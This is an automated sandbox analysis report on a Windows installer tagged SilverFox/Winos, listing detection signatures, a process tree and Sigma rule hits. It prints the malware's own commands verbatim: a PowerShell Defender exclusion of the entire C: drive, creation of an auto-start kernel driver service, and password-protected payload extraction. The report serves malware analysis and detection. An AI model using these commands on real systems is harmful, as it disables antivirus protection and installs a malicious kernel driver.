Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.2.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b1.0.2.exe
renamed because original name is a hash value
Original sample name:1.0.2.exe
Analysis ID:1579802
MD5:8d24ff51c87bc901cb4c88cb885dc15a
SHA1:c8f7e17799b8ad0769f83b2d7d8f491384aa93d0
SHA256:52ae54a6103be491559249ed1ed982b69b06948849a880db142eb37ff0484a3b
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.2.exe (PID: 4060 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" MD5: 8D24FF51C87BC901CB4C88CB885DC15A)
    • #U5b89#U88c5#U52a9#U624b1.0.2.tmp (PID: 6220 cmdline: "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 6336 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 3544 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b1.0.2.exe (PID: 3548 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT MD5: 8D24FF51C87BC901CB4C88CB885DC15A)
        • #U5b89#U88c5#U52a9#U624b1.0.2.tmp (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$203E4,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 5560 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6496 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5232 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 800 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5892 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5552 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2328 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4788 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2656 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6644 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 420 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5068 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6880 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1352 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3700 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6320 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6368 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5696 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1812 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4236 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5832 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5200 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7024 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6628 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3804 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6412 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4560 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5068 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5632 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1352 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1280 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5144 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1616 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1952 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4864 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5692 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4256 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2404 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2448 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3804 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2056 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 936 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5176 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6500 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4460 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 280 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1864 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5692 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5200 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7024 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6220, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6336, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5232, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 800, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6220, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6336, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5232, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 800, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6220, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6336, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 80.3% probability
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2189179691.0000000003720000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2188798294.0000000003520000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC3AEC0 FindFirstFileA,FindClose,FindClose,6_2_6CC3AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E96868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00E96868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E97496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00E97496
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
